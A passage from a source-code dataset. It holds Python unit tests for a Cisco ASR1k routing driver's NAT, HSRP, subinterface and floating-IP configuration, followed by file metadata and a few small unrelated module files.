from networking_cisco.plugins.cisco.cfg_agent.device_drivers.asr1k import (
asr1k_routing_driver as driver)
from networking_cisco.plugins.cisco.cfg_agent.device_drivers.asr1k import (
asr1k_snippets as snippets)
from networking_cisco.plugins.cisco.cfg_agent.device_drivers.csr1kv import (
cisco_csr1kv_snippets as csr_snippets)
from networking_cisco.plugins.cisco.cfg_agent.device_drivers.csr1kv import (
iosxe_routing_driver as iosxe_driver)
from networking_cisco.plugins.cisco.cfg_agent.service_helpers import (
routing_svc_helper)
from networking_cisco.plugins.cisco.common import cisco_constants
from networking_cisco.plugins.cisco.extensions import ha
from networking_cisco.plugins.cisco.extensions import routerrole
from networking_cisco.tests.unit.cisco.cfg_agent import cfg_agent_test_support
sys.modules['ncclient'] = mock.MagicMock()
_uuid = uuidutils.generate_uuid
DEV_NAME_LEN = iosxe_driver.IosXeRoutingDriver.DEV_NAME_LEN
HA_INFO = 'ha_info'
ROUTER_ROLE_ATTR = routerrole.ROUTER_ROLE_ATTR
ROUTER_ROLE_HA_REDUNDANCY = cisco_constants.ROUTER_ROLE_HA_REDUNDANCY
class ASR1kRoutingDriver(base.BaseTestCase,
cfg_agent_test_support.CfgAgentTestSupportMixin):
def setUp(self):
super(ASR1kRoutingDriver, self).setUp()
cfg.CONF.set_override('enable_multi_region', False, 'multi_region')
device_params = self.prepare_hosting_device_params()
self.driver = driver.ASR1kRoutingDriver(**device_params)
self.driver._ncc_connection = mock.MagicMock()
self.driver._check_response = mock.MagicMock(return_value=True)
self.driver._check_acl = mock.MagicMock(return_value=False)
def tearDown(self):
super(ASR1kRoutingDriver, self).tearDown()
self.driver._ncc_connection.reset_mock()
def _create_test_routers(self, is_user_visible=True):
self.router, ports = self.prepare_router_data(
is_user_visible=is_user_visible)
self.ri = routing_svc_helper.RouterInfo(self.router['id'],
self.router)
self.ha_priority = self.router[ha.DETAILS][ha.PRIORITY]
self.vrf = ('nrouter-' + self.router['id'])[:DEV_NAME_LEN]
# router port on external network, i.e., gateway port
self.ext_gw_port = self.router['gw_port']
self.ext_gw_port['ip_info'] = {
'subnet_id': self.ext_gw_port['subnets'][0]['id'],
'is_primary': True,
'ip_cidr': self.ext_gw_port['subnets'][0]['cidr']
}
self.ext_phy_infc = (
self.ext_gw_port['hosting_info']['physical_interface'])
self.vlan_ext = self.ext_gw_port['hosting_info']['segmentation_id']
self.ext_gw_upstream_ip = self.ext_gw_port['subnets'][0]['gateway_ip']
self.ext_gw_ip = self.ext_gw_port['fixed_ips'][0]['ip_address']
self.ext_gw_ip_cidr = self.ext_gw_port['subnets'][0]['cidr']
self.ext_gw_ip_mask = str(
netaddr.IPNetwork(self.ext_gw_ip_cidr).netmask)
port_ha_info = self.ext_gw_port['ha_info']
self.ext_gw_ha_group = port_ha_info['group']
# router port on internal network
self.int_port = ports[0]
self.int_port['ip_info'] = {
'subnet_id': self.int_port['subnets'][0]['id'],
'is_primary': True,
'ip_cidr': self.int_port['subnets'][0]['cidr']
}
self.int_port['change_details'] = {
'new_ports': [self.int_port],
'current_ports': [self.int_port],
'old_ports': [],
'former_ports': []
}
self.int_phy_infc = self.int_port['hosting_info']['physical_interface']
self.vlan_int = self.int_port['hosting_info']['segmentation_id']
self.int_gw_ip = self.int_port['fixed_ips'][0]['ip_address']
self.int_gw_ip_cidr = self.int_port['subnets'][0]['cidr']
self.int_gw_ip_mask = str(
netaddr.IPNetwork(self.int_gw_ip_cidr).netmask)
port_ha_info = self.int_port['ha_info']
self.int_gw_ip_vip = (
port_ha_info['ha_port']['fixed_ips'][0]['ip_address'])
self.int_gw_ha_group = port_ha_info['group']
self.floating_ip = '19.4.0.6'
self.fixed_ip = '35.4.0.20'
def _create_test_global_routers(self, num_ext_subnets=1, subnet_index=0):
# global router and its ports
self.global_router, gl_ports = self.prepare_router_data(
is_global=True, num_ext_subnets=num_ext_subnets)
self.ha_priority = self.global_router[ha.DETAILS][ha.PRIORITY]
self.ri_global = routing_svc_helper.RouterInfo(
self.global_router['id'], self.global_router)
self.gl_port = gl_ports[0]
self.gl_port['ip_info'] = {
'subnet_id': self.gl_port['subnets'][0]['id'],
'is_primary': True,
'ip_cidr': self.gl_port['subnets'][0]['cidr']
}
self.ext_phy_infc = self.gl_port['hosting_info']['physical_interface']
self.vlan_ext = self.gl_port['hosting_info']['segmentation_id']
self.gl_port_ip = self.gl_port['fixed_ips'][subnet_index]['ip_address']
self.gl_port_ip_cidr = self.gl_port['subnets'][subnet_index]['cidr']
self.gl_port_ip_mask = str(
netaddr.IPNetwork(self.gl_port_ip_cidr).netmask)
port_ha_info = self.gl_port['ha_info']
self.gl_port_vip = (
port_ha_info['ha_port']['fixed_ips'][subnet_index]['ip_address'])
self.gl_port_ha_group = port_ha_info['group']
def assert_edit_run_cfg(self, snippet_name, args):
if args:
confstr = snippet_name % args
else:
confstr = snippet_name
self.driver._ncc_connection.edit_config.assert_any_call(
target='running', config=confstr)
def _assert_number_of_edit_run_cfg_calls(self, num):
self.assertEqual(num,
self.driver._ncc_connection.edit_config.call_count)
def _generate_hsrp_cfg_args(self, subintfc, group, priority, vip, vlan):
return (subintfc,
group, priority,
group, vip,
group,
group, group, vlan)
def test_internal_network_added(self):
self._create_test_routers()
self.driver.internal_network_added(self.ri, self.int_port)
sub_interface = self.int_phy_infc + '.' + str(self.vlan_int)
cfg_args_sub = (sub_interface, self.vlan_int, self.vrf, self.int_gw_ip,
self.int_gw_ip_mask)
self.assert_edit_run_cfg(
snippets.CREATE_SUBINTERFACE_WITH_ID, cfg_args_sub)
cfg_args_hsrp = self._generate_hsrp_cfg_args(
sub_interface, self.int_gw_ha_group, self.ha_priority,
self.int_gw_ip_vip, self.vlan_int)
self.assert_edit_run_cfg(
snippets.SET_INTC_ASR_HSRP_EXTERNAL, cfg_args_hsrp)
def test_internal_network_added_with_multi_region(self):
cfg.CONF.set_override('enable_multi_region', True, 'multi_region')
self._create_test_routers()
is_multi_region_enabled = cfg.CONF.multi_region.enable_multi_region
self.assertEqual(True, is_multi_region_enabled)
region_id = cfg.CONF.multi_region.region_id
vrf = self.vrf + "-" + region_id
self.driver.internal_network_added(self.ri, self.int_port)
sub_interface = self.int_phy_infc + '.' + str(self.vlan_int)
cfg_args_sub = (sub_interface, region_id, self.vlan_int, vrf,
self.int_gw_ip, self.int_gw_ip_mask)
self.assert_edit_run_cfg(
snippets.CREATE_SUBINTERFACE_REGION_ID_WITH_ID, cfg_args_sub)
cfg_args_hsrp = self._generate_hsrp_cfg_args(
sub_interface, self.int_gw_ha_group, self.ha_priority,
self.int_gw_ip_vip, self.vlan_int)
self.assert_edit_run_cfg(
snippets.SET_INTC_ASR_HSRP_EXTERNAL, cfg_args_hsrp)
def test_internal_network_added_global_router(self):
self._create_test_global_routers()
self.driver.internal_network_added(self.ri_global, self.gl_port)
sub_interface = self.ext_phy_infc + '.' + str(self.vlan_ext)
cfg_args_sub = (sub_interface, self.vlan_ext,
self.gl_port_ip, self.gl_port_ip_mask)
self.assert_edit_run_cfg(
snippets.CREATE_SUBINTERFACE_EXTERNAL_WITH_ID, cfg_args_sub)
cfg_args_hsrp = self._generate_hsrp_cfg_args(
sub_interface, self.gl_port_ha_group, self.ha_priority,
self.gl_port_vip, self.vlan_ext)
self.assert_edit_run_cfg(
snippets.SET_INTC_ASR_HSRP_EXTERNAL, cfg_args_hsrp)
def test_internal_network_added_global_router_secondary_subnet(self):
self._create_test_global_routers(num_ext_subnets=2, subnet_index=1)
self.gl_port['ip_info']['subnet_id'] = self.gl_port['subnets'][1]['id']
self.gl_port['ip_info']['ip_cidr'] = self.gl_port['subnets'][1]['cidr']
self.gl_port['ip_info']['is_primary'] = False
self.driver.internal_network_added(self.ri_global, self.gl_port)
sub_interface = self.ext_phy_infc + '.' + str(self.vlan_ext)
cfg_args_sub = (sub_interface, self.gl_port_ip, self.gl_port_ip_mask)
self.assert_edit_run_cfg(
snippets.SET_INTERFACE_SECONDARY_IP, cfg_args_sub)
cfg_args_hsrp = (sub_interface, self.gl_port_ha_group,
self.gl_port_vip)
self.assert_edit_run_cfg(
snippets.SET_INTC_ASR_SECONDARY_HSRP_EXTERNAL, cfg_args_hsrp)
def test_internal_network_added_global_router_with_multi_region(self):
cfg.CONF.set_override('enable_multi_region', True, 'multi_region')
self._create_test_global_routers()
is_multi_region_enabled = cfg.CONF.multi_region.enable_multi_region
self.assertEqual(True, is_multi_region_enabled)
region_id = cfg.CONF.multi_region.region_id
self.driver.internal_network_added(self.ri_global, self.gl_port)
sub_interface = self.ext_phy_infc + '.' + str(self.vlan_ext)
cfg_args_sub = (sub_interface, region_id, self.vlan_ext,
self.gl_port_ip, self.gl_port_ip_mask)
self.assert_edit_run_cfg(
snippets.CREATE_SUBINTERFACE_EXT_REGION_ID_WITH_ID, cfg_args_sub)
cfg_args_hsrp = self._generate_hsrp_cfg_args(
sub_interface, self.gl_port_ha_group, self.ha_priority,
self.gl_port_vip, self.vlan_ext)
self.assert_edit_run_cfg(
snippets.SET_INTC_ASR_HSRP_EXTERNAL, cfg_args_hsrp)
def test_internal_network_added_global_router_with_multi_region_sec_sn(
self):
cfg.CONF.set_override('enable_multi_region', True, 'multi_region')
self._create_test_global_routers(num_ext_subnets=2, subnet_index=1)
is_multi_region_enabled = cfg.CONF.multi_region.enable_multi_region
self.assertEqual(True, is_multi_region_enabled)
self.gl_port['ip_info']['subnet_id'] = self.gl_port['subnets'][1]['id']
self.gl_port['ip_info']['ip_cidr'] = self.gl_port['subnets'][1]['cidr']
self.gl_port['ip_info']['is_primary'] = False
self.driver.internal_network_added(self.ri_global, self.gl_port)
sub_interface = self.ext_phy_infc + '.' + str(self.vlan_ext)
cfg_args_sub = (sub_interface, self.gl_port_ip, self.gl_port_ip_mask)
self.assert_edit_run_cfg(
snippets.SET_INTERFACE_SECONDARY_IP, cfg_args_sub)
cfg_args_hsrp = (sub_interface, self.gl_port_ha_group,
self.gl_port_vip)
self.assert_edit_run_cfg(
snippets.SET_INTC_ASR_SECONDARY_HSRP_EXTERNAL, cfg_args_hsrp)
def _make_test_router_non_ha(self):
self._create_test_routers()
self.ri.router[ha.ENABLED] = False
del self.ri.router[ha.DETAILS]
del self.ext_gw_port[HA_INFO]
del self.int_port[HA_INFO]
def test_external_network_added_non_ha(self):
self._make_test_router_non_ha()
self.driver.external_gateway_added(self.ri, self.ext_gw_port)
sub_interface = self.ext_phy_infc + '.' + str(self.vlan_ext)
self.assert_edit_run_cfg(csr_snippets.ENABLE_INTF, sub_interface)
cfg_params_nat = (self.vrf + '_nat_pool', self.ext_gw_ip,
self.ext_gw_ip, self.ext_gw_ip_mask)
self.assert_edit_run_cfg(snippets.CREATE_NAT_POOL, cfg_params_nat)
def test_external_network_added_user_visible_router(self):
self._create_test_routers()
self.driver.external_gateway_added(self.ri, self.ext_gw_port)
sub_interface = self.ext_phy_infc + '.' + str(self.vlan_ext)
self.assert_edit_run_cfg(csr_snippets.ENABLE_INTF, sub_interface)
cfg_params_nat = (self.vrf + '_nat_pool', self.ext_gw_ip,
self.ext_gw_ip, self.ext_gw_ip_mask)
self.assert_edit_run_cfg(snippets.CREATE_NAT_POOL, cfg_params_nat)
def test_external_network_added_redundancy_router(self):
self._create_test_routers(is_user_visible=False)
self.driver.external_gateway_added(self.ri, self.ext_gw_port)
sub_interface = self.ext_phy_infc + '.' + str(self.vlan_ext)
self.assert_edit_run_cfg(csr_snippets.ENABLE_INTF, sub_interface)
cfg_params_nat = (self.vrf + '_nat_pool', self.ext_gw_ip,
self.ext_gw_ip, self.ext_gw_ip_mask)
self.assert_edit_run_cfg(snippets.CREATE_NAT_POOL, cfg_params_nat)
def test_external_network_added_with_multi_region(self):
cfg.CONF.set_override('enable_multi_region', True, 'multi_region')
self._create_test_routers()
is_multi_region_enabled = cfg.CONF.multi_region.enable_multi_region
self.assertEqual(True, is_multi_region_enabled)
region_id = cfg.CONF.multi_region.region_id
vrf = self.vrf + "-" + region_id
self.driver.external_gateway_added(self.ri, self.ext_gw_port)
sub_interface = self.ext_phy_infc + '.' + str(self.vlan_ext)
self.assert_edit_run_cfg(csr_snippets.ENABLE_INTF, sub_interface)
cfg_params_nat = (vrf + '_nat_pool', self.ext_gw_ip,
self.ext_gw_ip, self.ext_gw_ip_mask)
self.assert_edit_run_cfg(snippets.CREATE_NAT_POOL, cfg_params_nat)
def test_external_gateway_removed_non_ha(self):
self._make_test_router_non_ha()
self.driver.external_gateway_removed(self.ri, self.ext_gw_port)
cfg_params_nat = (self.vrf + '_nat_pool', self.ext_gw_ip,
self.ext_gw_ip, self.ext_gw_ip_mask)
self.assert_edit_run_cfg(snippets.DELETE_NAT_POOL, cfg_params_nat)
sub_interface = self.ext_phy_infc + '.' + str(self.vlan_ext)
cfg_params_remove_route = (self.vrf,
sub_interface, self.ext_gw_upstream_ip)
self.assert_edit_run_cfg(snippets.REMOVE_DEFAULT_ROUTE_WITH_INTF,
cfg_params_remove_route)
def test_external_gateway_removed_user_visible_router(self):
self._create_test_routers()
self.driver.external_gateway_removed(self.ri, self.ext_gw_port)
cfg_params_nat = (self.vrf + '_nat_pool', self.ext_gw_ip,
self.ext_gw_ip, self.ext_gw_ip_mask)
self.assert_edit_run_cfg(snippets.DELETE_NAT_POOL, cfg_params_nat)
sub_interface = self.ext_phy_infc + '.' + str(self.vlan_ext)
cfg_params_remove_route = (self.vrf,
sub_interface, self.ext_gw_upstream_ip)
self.assert_edit_run_cfg(snippets.REMOVE_DEFAULT_ROUTE_WITH_INTF,
cfg_params_remove_route)
def test_external_gateway_removed_redundancy_router(self):
self._create_test_routers(is_user_visible=False)
self.driver.external_gateway_removed(self.ri, self.ext_gw_port)
cfg_params_nat = (self.vrf + '_nat_pool', self.ext_gw_ip,
self.ext_gw_ip, self.ext_gw_ip_mask)
self.assert_edit_run_cfg(snippets.DELETE_NAT_POOL, cfg_params_nat)
sub_interface = self.ext_phy_infc + '.' + str(self.vlan_ext)
cfg_params_remove_route = (self.vrf,
sub_interface, self.ext_gw_upstream_ip)
self.assert_edit_run_cfg(snippets.REMOVE_DEFAULT_ROUTE_WITH_INTF,
cfg_params_remove_route)
def test_external_gateway_removed_with_multi_region(self):
cfg.CONF.set_override('enable_multi_region', True, 'multi_region')
self._create_test_routers()
is_multi_region_enabled = cfg.CONF.multi_region.enable_multi_region
self.assertEqual(True, is_multi_region_enabled)
region_id = cfg.CONF.multi_region.region_id
vrf = self.vrf + "-" + region_id
self.driver.external_gateway_removed(self.ri, self.ext_gw_port)
cfg_params_nat = (vrf + '_nat_pool', self.ext_gw_ip,
self.ext_gw_ip, self.ext_gw_ip_mask)
self.assert_edit_run_cfg(snippets.DELETE_NAT_POOL, cfg_params_nat)
sub_interface = self.ext_phy_infc + '.' + str(self.vlan_ext)
cfg_params_remove_route = (vrf,
sub_interface, self.ext_gw_upstream_ip)
self.assert_edit_run_cfg(snippets.REMOVE_DEFAULT_ROUTE_WITH_INTF,
cfg_params_remove_route)
def test_external_gateway_removed_global_router(self):
self._create_test_global_routers()
self.driver._interface_exists = mock.MagicMock(return_value=True)
self.driver.external_gateway_removed(self.ri_global, self.gl_port)
sub_interface = self.ext_phy_infc + '.' + str(self.vlan_ext)
self.assert_edit_run_cfg(
csr_snippets.REMOVE_SUBINTERFACE, sub_interface)
def test_floating_ip_added(self):
self._create_test_routers()
self.driver.floating_ip_added(self.ri, self.ext_gw_port,
self.floating_ip, self.fixed_ip)
self._assert_number_of_edit_run_cfg_calls(1)
cfg_params_floating = (self.fixed_ip, self.floating_ip, self.vrf,
self.ext_gw_ha_group, self.vlan_ext)
self.assert_edit_run_cfg(snippets.SET_STATIC_SRC_TRL_NO_VRF_MATCH,
cfg_params_floating)
def test_floating_ip_added_with_multi_region(self):
cfg.CONF.set_override('enable_multi_region', True, 'multi_region')
self._create_test_routers()
is_multi_region_enabled = cfg.CONF.multi_region.enable_multi_region
self.assertEqual(True, is_multi_region_enabled)
region_id = cfg.CONF.multi_region.region_id
vrf = self.vrf + "-" + region_id
self.driver.floating_ip_added(self.ri, self.ext_gw_port,
self.floating_ip, self.fixed_ip)
self._assert_number_of_edit_run_cfg_calls(1)
cfg_params_floating = (self.fixed_ip, self.floating_ip, vrf,
self.ext_gw_ha_group, self.vlan_ext)
self.assert_edit_run_cfg(snippets.SET_STATIC_SRC_TRL_NO_VRF_MATCH,
cfg_params_floating)
def test_floating_ip_removed(self):
self._create_test_routers()
self.driver.floating_ip_removed(self.ri, self.ext_gw_port,
self.floating_ip, self.fixed_ip)
self._assert_number_of_edit_run_cfg_calls(1)
cfg_params_floating = (self.fixed_ip, self.floating_ip, self.vrf,
self.ext_gw_ha_group, self.vlan_ext)
self.assert_edit_run_cfg(snippets.REMOVE_STATIC_SRC_TRL_NO_VRF_MATCH,
cfg_params_floating)
def test_floating_ip_removed_with_multi_region(self):
cfg.CONF.set_override('enable_multi_region', True, 'multi_region')
self._create_test_routers()
is_multi_region_enabled = cfg.CONF.multi_region.enable_multi_region
self.assertEqual(True, is_multi_region_enabled)
region_id = cfg.CONF.multi_region.region_id
vrf = self.vrf + "-" + region_id
self.driver.floating_ip_removed(self.ri, self.ext_gw_port,
self.floating_ip, self.fixed_ip)
self._assert_number_of_edit_run_cfg_calls(1)
cfg_params_floating = (self.fixed_ip, self.floating_ip, vrf,
self.ext_gw_ha_group, self.vlan_ext)
self.assert_edit_run_cfg(snippets.REMOVE_STATIC_SRC_TRL_NO_VRF_MATCH,
cfg_params_floating)
def test_driver_enable_internal_network_NAT(self):
self._create_test_routers()
self.driver.enable_internal_network_NAT(self.ri, self.int_port,
self.ext_gw_port)
self._assert_number_of_edit_run_cfg_calls(4)
acl_name = '%(acl_prefix)s_%(vlan)s_%(port)s' % {
'acl_prefix': 'neutron_acl',
'vlan': self.vlan_int,
'port': self.int_port['id'][:8]}
net = netaddr.IPNetwork(self.int_gw_ip_cidr).network
net_mask = netaddr.IPNetwork(self.int_gw_ip_cidr).hostmask
cfg_params_create_acl = (acl_name, net, net_mask)
self.assert_edit_run_cfg(
csr_snippets.CREATE_ACL, cfg_params_create_acl)
pool_name = "%s_nat_pool" % self.vrf
cfg_params_dyn_trans = (acl_name, pool_name, self.vrf)
self.assert_edit_run_cfg(
snippets.SET_DYN_SRC_TRL_POOL, cfg_params_dyn_trans)
sub_interface_int = self.int_phy_infc + '.' + str(self.vlan_int)
sub_interface_ext = self.int_phy_infc + '.' + str(self.vlan_ext)
self.assert_edit_run_cfg(csr_snippets.SET_NAT,
(sub_interface_int, 'inside'))
self.assert_edit_run_cfg(csr_snippets.SET_NAT,
(sub_interface_ext, 'outside'))
def test_driver_enable_internal_network_NAT_with_multi_region(self):
cfg.CONF.set_override('enable_multi_region', True, 'multi_region')
self._create_test_routers()
is_multi_region_enabled = cfg.CONF.multi_region.enable_multi_region
self.assertEqual(True, is_multi_region_enabled)
region_id = cfg.CONF.multi_region.region_id
vrf = self.vrf + "-" + region_id
self.driver.enable_internal_network_NAT(self.ri, self.int_port,
self.ext_gw_port)
self._assert_number_of_edit_run_cfg_calls(4)
acl_name = '%(acl_prefix)s_%(region_id)s_%(vlan)s_%(port)s' % {
'acl_prefix': 'neutron_acl',
'region_id': region_id,
'vlan': self.vlan_int,
'port': self.int_port['id'][:8]}
net = netaddr.IPNetwork(self.int_gw_ip_cidr).network
net_mask = netaddr.IPNetwork(self.int_gw_ip_cidr).hostmask
cfg_params_create_acl = (acl_name, net, net_mask)
self.assert_edit_run_cfg(
csr_snippets.CREATE_ACL, cfg_params_create_acl)
pool_name = "%s_nat_pool" % vrf
cfg_params_dyn_trans = (acl_name, pool_name, vrf)
self.assert_edit_run_cfg(
snippets.SET_DYN_SRC_TRL_POOL, cfg_params_dyn_trans)
sub_interface_int = self.int_phy_infc + '.' + str(self.vlan_int)
sub_interface_ext = self.int_phy_infc + '.' + str(self.vlan_ext)
self.assert_edit_run_cfg(csr_snippets.SET_NAT,
(sub_interface_int, 'inside'))
self.assert_edit_run_cfg(csr_snippets.SET_NAT,
(sub_interface_ext, 'outside'))
def test_driver_disable_internal_network_NAT(self):
self._create_test_routers()
self.driver.disable_internal_network_NAT(self.ri, self.int_port,
self.ext_gw_port)
self._assert_number_of_edit_run_cfg_calls(3)
acl_name = '%(acl_prefix)s_%(vlan)s_%(port)s' % {
'acl_prefix': 'neutron_acl',
'vlan': self.vlan_int,
'port': self.int_port['id'][:8]}
pool_name = "%s_nat_pool" % self.vrf
cfg_params_dyn_trans = (acl_name, pool_name, self.vrf)
self.assert_edit_run_cfg(
snippets.REMOVE_DYN_SRC_TRL_POOL, cfg_params_dyn_trans)
self.assert_edit_run_cfg(csr_snippets.REMOVE_ACL, acl_name)
def test_driver_disable_internal_network_NAT_with_multi_region(self):
cfg.CONF.set_override('enable_multi_region', True, 'multi_region')
self._create_test_routers()
is_multi_region_enabled = cfg.CONF.multi_region.enable_multi_region
self.assertEqual(True, is_multi_region_enabled)
region_id = cfg.CONF.multi_region.region_id
vrf = self.vrf + "-" + region_id
self.driver.disable_internal_network_NAT(self.ri, self.int_port,
self.ext_gw_port)
self._assert_number_of_edit_run_cfg_calls(3)
acl_name = '%(acl_prefix)s_%(region_id)s_%(vlan)s_%(port)s' % {
'acl_prefix': 'neutron_acl',
'region_id': region_id,
'vlan': self.vlan_int,
'port': self.int_port['id'][:8]}
pool_name = "%s_nat_pool" % vrf
cfg_params_dyn_trans = (acl_name, pool_name, vrf)
self.assert_edit_run_cfg(
snippets.REMOVE_DYN_SRC_TRL_POOL, cfg_params_dyn_trans)
self.assert_edit_run_cfg(csr_snippets.REMOVE_ACL, acl_name)
def test_enable_interface_user_visible_router(self):
self._create_test_routers()
self.driver.enable_router_interface(self.ri, self.ext_gw_port)
sub_interface = self.ext_phy_infc + '.' + str(self.vlan_ext)
self.assert_edit_run_cfg(csr_snippets.ENABLE_INTF, sub_interface)
def test_enable_interface_redundancy_router(self):
self._create_test_routers(is_user_visible=False)
self.driver.enable_router_interface(self.ri, self.ext_gw_port)
sub_interface = self.ext_phy_infc + '.' + str(self.vlan_ext)
self.assert_edit_run_cfg(csr_snippets.ENABLE_INTF, sub_interface)
def test_disable_interface_user_visible_router(self):
self._create_test_routers()
self.driver.disable_router_interface(self.ri, self.ext_gw_port)
sub_interface = self.ext_phy_infc + '.' + str(self.vlan_ext)
self.assert_edit_run_cfg(csr_snippets.DISABLE_INTF, sub_interface)
def test_disable_interface_redundancy_router(self):
self._create_test_routers(is_user_visible=False)
self.driver.disable_router_interface(self.ri, self.ext_gw_port)
sub_interface = self.ext_phy_infc + '.' + str(self.vlan_ext)
self.assert_edit_run_cfg(csr_snippets.DISABLE_INTF, sub_interface)
def test_get_configuration(self):
self._create_test_routers()
self.driver._get_running_config = mock.MagicMock()
self.driver.get_configuration()
self.driver._get_running_config.assert_called_once_with(split=False)
| 46.274834 | 79 | 0.674275 | 3,852 | 27,950 | 4.421599 | 0.069055 | 0.036167 | 0.036461 | 0.04697 | 0.854685 | 0.834077 | 0.799319 | 0.765324 | 0.753464 | 0.737318 | 0 | 0.003077 | 0.232665 | 27,950 | 603 | 80 | 46.351575 | 0.791066 | 0.025689 | 0 | 0.646316 | 0 | 0 | 0.057174 | 0.005732 | 0 | 0 | 0 | 0 | 0.149474 | 1 | 0.075789 | false | 0 | 0.031579 | 0.002105 | 0.111579 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
2578a81e80aeb39a95eb07db18a641f8b9b0d2d9 | 60 | py | Python | influx_logging/__init__.py | jainsau/influxdb_logging | d908757cbd55cf19e73d7ff8a6c5713d368f9cb0 | [
"MIT"
] | 8 | 2018-02-22T12:40:25.000Z | 2021-09-20T04:05:05.000Z | influx_logging/__init__.py | jainsau/influxdb_logging | d908757cbd55cf19e73d7ff8a6c5713d368f9cb0 | [
"MIT"
] | 4 | 2018-02-23T13:28:27.000Z | 2021-06-03T22:10:00.000Z | influx_logging/__init__.py | jainsau/influxdb_logging | d908757cbd55cf19e73d7ff8a6c5713d368f9cb0 | [
"MIT"
] | 6 | 2018-03-25T00:36:40.000Z | 2021-11-17T16:55:14.000Z | from .handler import InfluxHandler, BufferingInfluxHandler
| 20 | 58 | 0.866667 | 5 | 60 | 10.4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1 | 60 | 2 | 59 | 30 | 0.962963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
25ad9e44659a59e0c2cd49cc158367181bdbf2f1 | 645 | py | Python | terrascript/launchdarkly/d.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 507 | 2017-07-26T02:58:38.000Z | 2022-01-21T12:35:13.000Z | terrascript/launchdarkly/d.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 135 | 2017-07-20T12:01:59.000Z | 2021-10-04T22:25:40.000Z | terrascript/launchdarkly/d.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 81 | 2018-02-20T17:55:28.000Z | 2022-01-31T07:08:40.000Z | # terrascript/launchdarkly/d.py
# Automatically generated by tools/makecode.py ()
import warnings
warnings.warn(
"using the 'legacy layout' is deprecated", DeprecationWarning, stacklevel=2
)
import terrascript
class launchdarkly_environment(terrascript.Data):
pass
class launchdarkly_feature_flag(terrascript.Data):
pass
class launchdarkly_feature_flag_environment(terrascript.Data):
pass
class launchdarkly_project(terrascript.Data):
pass
class launchdarkly_segment(terrascript.Data):
pass
class launchdarkly_team_member(terrascript.Data):
pass
class launchdarkly_webhook(terrascript.Data):
pass
| 16.973684 | 79 | 0.786047 | 71 | 645 | 6.985915 | 0.450704 | 0.239919 | 0.268145 | 0.290323 | 0.524194 | 0.306452 | 0.189516 | 0 | 0 | 0 | 0 | 0.001805 | 0.141085 | 645 | 37 | 80 | 17.432432 | 0.893502 | 0.11938 | 0 | 0.368421 | 1 | 0 | 0.069027 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.368421 | 0.105263 | 0 | 0.473684 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
25c3d479ba49eb53faf69b4f48a843474819a047 | 207 | py | Python | tests/_test_utils.py | Pietroobbiso/Forecasting-intermittent-demand-a-comparative-approach | bb2336caf61a050b6ebfae559f895be92a33b0eb | [
"Apache-2.0"
] | null | null | null | tests/_test_utils.py | Pietroobbiso/Forecasting-intermittent-demand-a-comparative-approach | bb2336caf61a050b6ebfae559f895be92a33b0eb | [
"Apache-2.0"
] | null | null | null | tests/_test_utils.py | Pietroobbiso/Forecasting-intermittent-demand-a-comparative-approach | bb2336caf61a050b6ebfae559f895be92a33b0eb | [
"Apache-2.0"
] | null | null | null | from typing import Union
import numpy as np
def equal_arrays(
arr_a: Union[np.ndarray, list], arr_b: Union[np.ndarray, list]
) -> bool:
return all([a == b for a, b in zip(arr_a, arr_b)])
| 20.7 | 67 | 0.637681 | 37 | 207 | 3.432432 | 0.567568 | 0.062992 | 0.220472 | 0.283465 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.236715 | 207 | 9 | 68 | 23 | 0.803797 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.333333 | 0.166667 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
25ff057a387018e7335720e2dd7e725bb697102b | 40 | py | Python | mangadex/http/result/__init__.py | mansuf/mangadex.py | 42d6278f4383c99fb64add179dff3df3e82b2baa | [
"MIT"
] | null | null | null | mangadex/http/result/__init__.py | mansuf/mangadex.py | 42d6278f4383c99fb64add179dff3df3e82b2baa | [
"MIT"
] | null | null | null | mangadex/http/result/__init__.py | mansuf/mangadex.py | 42d6278f4383c99fb64add179dff3df3e82b2baa | [
"MIT"
] | null | null | null | from .auth import *
